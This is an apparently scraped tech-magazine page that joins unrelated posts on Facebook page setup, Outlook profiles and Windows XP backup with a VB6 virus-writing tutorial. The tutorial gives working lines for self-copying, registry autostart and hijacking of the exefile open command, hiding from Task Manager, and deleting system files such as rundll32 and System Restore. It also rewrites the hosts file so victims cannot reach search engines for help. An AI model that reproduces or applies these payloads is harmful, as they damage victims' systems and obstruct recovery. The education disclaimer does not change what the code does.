Facebook  Twitter  Google +  Linkedin

It's about time you give your business the publicity it needs using FREE tools like FACEBOOK PAGE. We will take you through all the necessary steps to have your organisation or company or business page up and running.
NOTE: we shall use an example of tour and travel company and the name used "BANAKAMPALA SAFARIS LTD" is a demo name not anywhere registered as a company name.

Visit https://www.facebook.com/pages/creation/ Look at the bottom of the page and click on Create a Page link.

I have always wanted to customize yourictmagazine facebook page but used to face a couple of challenges. Either the instructions i was following or just too much words were being used in the process.
Anyway there just 3 steps you need to have your facebook page get a unique name like http://www.facebook.com/yourictmagazine

However you must ensure that your facebook page has atleast a minimum of 25 fans.



1 Sign into your account.
NOTE: You must ensure your an page administrator for you to be able to assign it a name.

2. Click on pages (Left Hand Side) of your account.
When into your page click on Edit page button on the Right Hand Side top Corner of your page.

3. Go to Basic Information ----> click on Create a username for this Page? Type in your preferred username.

OK..... talking about Viruses or Virii is really touchy subject and sometimes maybe taboo but the virus underground has much history as the hacker underground and in earlier provided anti-virus companies with copies of latest viruses to create
signatures. The virus underground earlier sought to separate itself from the hacker underground but i believe the two communites exists dependent and relying on each other as many modern blended threats show.
The virus underground has been active as early as the 1970's and still remains active though has changed faces over the years as much as the hacker underground has. These days it maybe considered a hobby by some and a way of earning some money by others and its considered criminal by some governments but whatever your view or stand is the virus underground will still persist.

Read More Why am i writing this?
Well the answer is really simple, i don't know...anyway the more knowledge you acquire the better you can protect yourself against certain viral attacks. And the next wave or if it's not already being used is corporate espionage using viruses which all companies need to guard against. Imagine a virus or call it malware that runs on your network and informs a third party about the ongoings of your company or even send copies of your documents..i know scary stuff.

How are viruses made?

This one curious argument i came across where the guys actually had very little knowledge of what they were talking about but were still right. A virus can be written in any language....YES any language..Yes even VB6  but ofcourse the more low level the langauge the more control of the system the virus has.
To understand how a virus is made you need to understand what it is first

What is a virus?
A computer virus is a computer program that can copy itself and infect a computer. The term "virus" is also commonly but erroneously used to refer to other types of malware, adware, and spyware programs that do not have the reproductive ability.
The term "computer virus" is sometimes used as a catch-all phrase to include all types of malware.

Ok lets break down the different subroutines of a virus.....(NB: am considering a modular design but hey a writer can write a virus the way he feels like, its up to him/her). This is a simplistict view of a virus assuming a non-resident virus. A resident virus would required modification of the different routines.

The different required subroutines of a virus would be:

1. search
This is the routine that searches for files to infect on a disk

2. Copy/replication/spreading
This routine copies the viral code into the target file or directory depending on the viral spread mechanism.
There are very many vectors of infection used by viruses. Viruses have targeted various types of transmission media or hosts. This list is not exhaustive:

  • Binary executable files (such as COM files and EXE files in MS-DOS, Portable Executable files in Microsoft Windows, and ELF files in Linux).
  • Volume Boot Records of floppy disks and hard disk partitions
  • The master boot record (MBR) of a hard disk
  • General-purpose script files (such as batch files in MS-DOS and Microsoft Windows, VBScript files, and shell script files on Unix-like platforms).
  • Application-specific script files (such as Telix-scripts)
  • System specific autorun script files (such as Autorun.inf file needed to Windows to automatically run software stored on USB Memory Storage Devices).
  • Documents that can contain macros (such as Microsoft Word documents, Microsoft Excel spreadsheets, AmiPro documents, and Microsoft Access database files)
  • Cross-site scripting vulnerabilities in web applications

3. anti-detection routines
Various anti-detection routines are employed modern viruses some of which include use of stealth(for example trapping OS messages  through API hooking), self modification, polymophic code and many others

4. Payload
I would like to think each virus has a payload even if its annoying the hell out of us or overwriting files, deleting files. Displaying really really annoying windows and the like.....though some writer are really creative.

Where is our simple virus?
Ok...cool down we are getting to that part...now that we know some basic information about viruses let us delve into the evil art of virus writing. Back in the day ...ok not that far back virus writers needed to be conversant with assembly programming or even have advanced skills in c,C++ and such languages but assembly was a must because it provided greater control of the system making
the virus absolutely wicked(read very good). But as years passed more HLL are being employed to create worms, viruses and many  forms of malware.

Ok enough yapping lets try to create a simple virus using the old language(not that old) of vb6....follwing the modular design
mentioned above plus modifications.
NB: The code is left intentionally sketchy because of any malicious guys reading this....yeah i know your out there<wink>

1. Search routine
We dont need a search routine because we are not infecting any files

2. Copy/replication/spreading
FileCopy App.Path & "\" & App.EXEName & ".EXE", "Drive:\Path\Name.exe"
NB: ofcourse a little more intelligence is required....eg detecting when a USB device is plugged in (man i love legacy vb code, its like english)
Ahh forgot on important code...to ensure out virus runs when the system starts...regedit anyone Shell "REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ###Name### /t REG_SZ /d ###Drive:\Path\Name.exe### /f", vbHide
This command will make your application start with windows.

Another startup method??

Shell "REG add HKCR\exefile\shell\open\command /v Shell /t REG_SZ /d ###Drive:\Path\Name.exe### %1 %* /f", vbHide
This command will make your application start when ever the victim opens another application via msnmsngr.exe as an example.

3. anti-detection routine
Really these are all simple lines of code
On Error Resume Next
This command will allow the application to continue running even if an error occurs instead of terminating/closing.
This command will hide the application from even being seen on the victims screen even if your program has it's settings set to Visible|True
App.TaskVisible = False
This command is even better, this command will stop your program from showing up in Task Manager-Applications Tab List, but it will still show up in process list...too bad

4. Payloads
Now vb6 was truly beautifully easy and nice...but also nasty if in the wrong hands...lets see some sample payloads

Deleting some system files and control panel elements
Kill "%SystemRoot%\syst" & "em32\dfrg.msc"
Kill "%SystemRoot%\syste" & "m32\wscui.cpl"
Kill "C:\Program Files\Co" & "mmon Files\Microsoft Shared\MSInfo\msinfo32.exe"
Kill "%SystemRoot%\syste" & "m32\restore\rstrui.exe"
Kill "c:\WINDOWS\syste" & "m32\rundll32.exe"
Getting rid of System Restore, Rundll(by deleting this file, the victim can no longer view the properties window for any file on his or her computer)

Just something to help stop the victim from google-ing what the virus has done, and getting information or downloads to help rid them of your infection.
Open "c:\WINDOWS\system32\drivers\etc\hosts" For Output As #1
Print #1, " "
Print #1, " www.google.com"
Print #1, " www.google.co.uk"
Print #1, " www.yahoo.com"
Print #1, " www.yahoo.co.uk"
Print #1, " www.askjeeves.com"
Print #1, " www.altavista.com"
Print #1, " www.alltheweb.com"
Print #1, " www.msn.com"
Print #1, " www.hotmail.com"
Print #1, " www.myspace.com"
Print #1, " www.plunder.com"
Print #1, " www.quicksharing.com"
Print #1, " www.myspace.co.uk"
Close #1

Ok...we can go on and on but the list is endless...its up to the virus writer to be as creative as he wants otherwise you have the basic knowledge but protection from infection even without an anti-virus is possible but with very many creative execution techniques being employed by virus writers its becoming extremly difficult...a more recent example cites a vulnerabilty in adobe
reader whereby malicious code could be executed without the user even opening the file...just keep your anti-virus uptodate.

Till next time.....

Cybus project:
This is an anti-virus project being conducted in conjuction with Jospeh of intrusecurity, please give us any suggestions of what you would like your anti-virus to do...or not to do..
check out the project progress at http://cybus.ashemug.com
This information is intended for education purposes and the author is not responsible for any misuse or damage caused if tried on a system without permission.

By David

Sometime back I wrote steps on how to configure Microsoft outlook and Microsoft outlook express.
Today I want to add something important that can be useful to you incase you have more than one email address and you want to use the same email application to download emails.
These steps help you to avoid mixing emails.


Microsoft Outlook Express; follow the steps below:-


  1. Open up your Microsoft outlook express, Click on File -> Identities -> Add Identities.
  2. Type your name “name to identify your identity” you can provide it a password by ticking “Require a password”.
  3. Click “OK” and a pop box will appear “Do you want to “name of your identity” now?
  4. Then you will be switched to your newly created identity and can start configuring it with necessary email settings. Follow the steps HOWTO CONFIGURE MICROSOFT OUTLOOK EXPRESS. Read More


Microsoft Outlook;


  1. Click on Start -> Control panel -> then double click “Mail” icon.
  2. Choose profiles on the three options provided “Setup multiple profiles of e-mail accounts and data files.” Click on “Show profiles”.
  3. Click on Add and then enter the profile name into the popup box and click.
  4. Then you will be redirected a configuration wizard box and you can use the steps in “HOWTO SETUP MICROSOFT OUTLOOK.
  5. NOTE: To be able to switch between profiles at startup I suggest you enable that option  of “prompt for a profile to be used”.

The reasons why I prefer creating profiles or identities for emails is that, you can clearly separate your emails as per your account details and yet at same time your using  one application of your choice.

Computers are perhaps the most significant invention of the 20th century. Most companies and individuals rely on them. We tend to perform simple tasks to life changing ones from writing a multi billion dollar proposal to simple ones like sending an email and this entirely end up being saved on a computer hard disk.  With such activities on your pc could probably encounter some sort of malfunction or hiccup that causes you to either lose productivity or worse, all your work.
To avoid such incidence Microsoft Windows XP was created with a program called Windows XP Back Up application. This can help you to backup all your data and save you from the expensive recovery process. Safely store your data and be retrievable should your hard drive crash -- though if you have corrupted data, this option may not be as helpful.